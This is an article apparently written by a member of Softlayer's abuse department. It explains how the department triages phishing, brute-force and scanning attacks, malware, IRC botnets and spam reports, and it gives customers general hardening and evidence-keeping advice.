“I, the undersigned, certify under penalty of perjury”, “We believe the following host has recently been compromised”, “I received the below unsolicited commercial e-mail”, are a few statements that we as The Softlayer Abuse Department receive on a routine basis. The responsibility of responding to these quite serious matters in of itself is what gives us our motivation and niche in the overall scheme of this company: the protection of our networks global reputation. Without a firm and diligent abuse department, many of our customers would experience extreme packet loss left and right. Some customers may be affected by another provider’s block on an entire subnet, due to a single server periodically attacking their network for a month. Others would assuredly have their IP addresses consistently listed in spam databases, and therefore restricting e-mail contact to most or all of their clients. So in order to help keep these things from happening; we need to ensure that any reported or detected abusive activities occurring on our network are thoroughly responded to. We do this by analyzing abuse reports, determining the nature of the issues, and if an issue is valid, a ticket is opened with the customer for further correspondence as we track the issues resolution. At the same time, we maintain communication with other organizations and providers to ensure that matters are quickly addressed.
While most issues are resolved, or are being resolved within 24 to 72 hours, some issues require a quicker response. One of these is Phishing sites, which need to be removed within a shorter time frame. Our procedures regarding these sites are due to the fact that they are one of the most dangerous and wide spread issues on the internet today. If you’re not familiar with, or just want to read up on some of the latest news regarding these sites, you can get everything you need to know at APWG’s (Anti-Phishing Working Group) website. Softlayer’s membership within APWG allows us access to the most recent industry level trends and activities for a range of abusive issues. This gives us a much greater insight and oversight to identify and resolve issues that are negatively affecting our network. I can’t speak too much publicly past the above general time frames; since most abuse work is to some degree like spam filters, immediate disclosure of detection methods and procedures would render them useless. However, I can say that we believe one of the most effective methods for combating phishing is consumer education. If users are familiar with how fraudulent operations work, they are more likely to recognize components of them when they see them and not become victims. In support of this concept, we encourage all of our customers to respond to phishing site ’take downs’ by replacing the phishing site with a redirect to the APWG’s phishing education landing page. This page is an informative document that explains to the user that they were about to become a victim of illegal activity, and goes on to explain phishing in more detail. Most people in today’s modern society won’t go too far out of their way to obtain new information regarding trends in cybercrime. As such, the moment in which someone is about to be the victim of a phishing scam is considered to the ‘teachable moment’. This is the moment that someone has clicked on a link that they believe goes to their banks’ website, but are redirected to an educational page about phishing instead. The page is also configured to work with a variety of different languages, based on the client browser settings. As more people encounter the APWG’s landing page instead of a phishing site, the faster phishing education will spread and the less number of potential victims will exist. You may find information on how to implement the redirect here.
One of the next most concerning matters that we address is, servers being used by unauthorized third parties to conduct some form of outbound attack. While each are in there own way malicious and need the same attention, here’s a few specifics on some of the general different types. Password Cracking/Brute Force – this is typically done by malicious content attacking multiple hosts simultaneously while attempting various username and password combinations, typically with a massive list of pre-defined words. One of the easiest ways to help protect a server against being effected is to change at least your SSH, FTP, RDP, to non standard ports and ensure that you have complex passwords. I would also advise enabling account lockouts after a certain number of failed login attempts. Another predominant type of malicious scanning is doing so on an entire netblock by checking each host within them to see if one or more ports are open per host, which is then reported back to a database for later use in the latter form of attack. Essentially anything that is in some way part of an intrusion attempt is a priority.
Next we move on to an area of abuse that has most likely affected all of us at some point in time – Malware. This is a very general term we use to describe any software that has been written with malicious intent. The possible functions and uses for malware are only limited by the imagination and the software platforms that they are built upon, assuming that the infection process doesn’t accidentally crash the server. Various forms of malware have been identified as responsible for every type of abuse issue noted in this article at some point in time. While at the same time, malware on your server is not the guaranteed reason it may be conducting outbound abusive activities. Most specific malware related tickets are in reference to a single or series of malicious files that are publicly accessible. These issues are often resolved quickly upon deletion of the file(s) in question. However, it is also equally as important to ensure that any security vulnerabilities that allowed these files to be uploaded are repaired, or you can almost guarantee that the problem will reoccur. Microsoft reported that during the 1st half of 2008, over 90% of system vulnerability and subsequent infections were attributable to ‘weak’ applications rather than malware targeting the operating system itself. – Microsoft S.I.R. Vulnerabilities within the application layer remained the predominant risk throughout the 2nd half of 2008 as well. Malware in general has remained a formidable electronic adversary through 2009 and on to the present. As such, it is very important to ensure that you are using the most current version of all installed applications, and that they were written by a trusted source in addition to the maintaining the operating system security.
One very common form of malware effecting servers is an IRC(Internet Relay Chat) bot. One bot alone can be responsible for the infections of countless other machines. This is commonly done by injecting malicious code into poorly written PHP scripts. However, the bigger problem with an IRC bot is the fact that it’s connected to an IRC Botnet Controller, which is capable of commanding massive amounts of infected hosts simultaneously. While these are typically used for spam or other similar illicit activities, there is still the potential for the infected servers to be involved with even worse situations. These are in effect: A virtual army that’s literally capable of taking small countries off of the internet grid. In June of 2007, the F.B.I. initiated operation ‘Bot Roast’ an ongoing investigation to locate the people behind the wires. But in the mean time, needless to say, these matters need to be addressed as soon as possible.
During our triaging of abuse reports, we also address the very common issue of Spam. The three major types listed in order of priority are: Phishing, General Fraudulence, and other infected hosts Spam. However, you may also be audited, if you will, with a Spam ticket regarding a mailing list one of your clients is operating. For additional information regarding email marketing and the industry’s best practices, spamhaus.org’s FAQ is a very useful resource.
Keeping the above in mind, there is also one last thing to consider; maintain a backup of all removed malicious content after it has been found. This evidence could prove invaluable to law enforcement, should the request for it be presented. We also encourage you to review your access logs to determine the source IP address(s) of any intruder or other malicious entity, such that you may report it to the appropriate organization. As it is with many other aspects of life, communication regarding these issues remains critical for timely and appropriate resolutions.
-Andrew Smith – Martinez